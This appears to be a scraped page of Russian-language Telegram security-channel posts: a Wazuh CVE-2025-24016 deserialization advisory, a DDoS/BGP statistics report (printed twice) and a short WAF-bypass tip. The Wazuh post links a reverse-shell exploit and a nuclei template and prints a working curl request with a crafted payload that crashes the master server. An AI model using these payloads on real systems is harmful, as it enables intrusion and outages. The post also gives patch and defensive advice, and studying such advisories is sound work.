В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
DistributedAPI в формате JSON и последующей десериализации через функцию as_wazuh_object (расположенную в framework/wazuh/core/cluster/common.py). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. ➡️Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
git clone https://github.com/0xjessie21/CVE-2025-24016.gitСкрипт позволяет сразу сделать reverse shell
python3 CVE-2025-24016.py -u -i -p PoC 2. Шаблон для nuclei
wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yamlТам есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️Рекомендации
▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️Ограничение доступа: Проверьте и ограничьте доступ к API.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
15.02.202513:07
Эксперты CURATOR (до ноября 2024 — Qrator Labs) выпустили годовой отчет “DDoS-атаки, боты и BGP-инциденты в 2024 году: статистика и тренды”, в котором собрали самые важные факты об угрозах прошедшего года. Внутри много интересного, вот основные цифры:
📈 Рост DDoS-атак
• Общее число DDoS-атак выросло на 53% по сравнению с 2023 годом
• Рекордная атака достигла 1,14 Тбит/с, на 65% больше прошлогоднего рекорда
• Самая длительная атака продолжалась 19 дней (в 2023 году — 3 дня)
• Крупнейший ботнет года — 227 тыс. устройств (в 2023 году — 136 тыс.)
🏦 Кого атаковали чаще всего
• Наибольшее число L3-L4 атак: Финтех (25,8%), Электронная коммерция (20,5%) и Медиа (13,5%)
• 52% всех L7 атак пришлось на Финтех, на втором и третьем местах — Электронная коммерция (18%) и ИТ и Телеком (9,6%)
🤖 Боты
• Среднемесячная активность ботов выросла на 30%
• Чаще всего атаковали Онлайн-ритейл — 36,2% от всей бот-активности
🌍 Страны-источники DDoS-атак
1. Россия — 32,4%
2. США — 20,6%
3. Бразилия — 5,8% (Китай выпал из топ-3)
🌐 BGP-инциденты
• Рост BGP route leaks — на 10%, BGP hijacks — на 24%
• Глобальные инциденты: +59% route leaks
• Один из успехов: предотвращение глобальной утечки маршрутов с использованием стандарта RFC 9234, разработанного экспертами CURATOR вместе с IETF
Вы можете скачать полный отчет, чтобы узнать все подробности.
А еще недавно ребята создали Telegram-канал CURATOR, чтобы делиться своей экспертизой. Можете подписаться на них и следить за обновлениями.
📈 Рост DDoS-атак
• Общее число DDoS-атак выросло на 53% по сравнению с 2023 годом
• Рекордная атака достигла 1,14 Тбит/с, на 65% больше прошлогоднего рекорда
• Самая длительная атака продолжалась 19 дней (в 2023 году — 3 дня)
• Крупнейший ботнет года — 227 тыс. устройств (в 2023 году — 136 тыс.)
🏦 Кого атаковали чаще всего
• Наибольшее число L3-L4 атак: Финтех (25,8%), Электронная коммерция (20,5%) и Медиа (13,5%)
• 52% всех L7 атак пришлось на Финтех, на втором и третьем местах — Электронная коммерция (18%) и ИТ и Телеком (9,6%)
🤖 Боты
• Среднемесячная активность ботов выросла на 30%
• Чаще всего атаковали Онлайн-ритейл — 36,2% от всей бот-активности
🌍 Страны-источники DDoS-атак
1. Россия — 32,4%
2. США — 20,6%
3. Бразилия — 5,8% (Китай выпал из топ-3)
🌐 BGP-инциденты
• Рост BGP route leaks — на 10%, BGP hijacks — на 24%
• Глобальные инциденты: +59% route leaks
• Один из успехов: предотвращение глобальной утечки маршрутов с использованием стандарта RFC 9234, разработанного экспертами CURATOR вместе с IETF
Вы можете скачать полный отчет, чтобы узнать все подробности.
А еще недавно ребята создали Telegram-канал CURATOR, чтобы делиться своей экспертизой. Можете подписаться на них и следить за обновлениями.
05.02.202512:26
Обходим WAF с помощью лайфхака из Twitter'а и немного defensive
#WAF #web #twitter
Также это можно настроить автоэнкодинг в бурп суюте
Логика простая: WAF или любая другая система фильтрации ввода вероятно будет блокировать только определенный список UTF-8 символов
Как защититься?
Конвертируйте весь ввод строго в UTF-8 формат, так вы сильно упростите себе жизнь и правила фильтрации
🌚 @poxek
#WAF #web #twitter
Также это можно настроить автоэнкодинг в бурп суюте
Логика простая: WAF или любая другая система фильтрации ввода вероятно будет блокировать только определенный список UTF-8 символов
Как защититься?
Конвертируйте весь ввод строго в UTF-8 формат, так вы сильно упростите себе жизнь и правила фильтрации
🌚 @poxek
03.02.202518:08
Это лучшее, что вы увидите за этот вечер 😂
26.01.202510:11
Вопрос к студентам и начинающим в ИБ
दिखाया गया 1 - 2 का 2
अधिक कार्यक्षमता अनलॉक करने के लिए लॉगिन करें।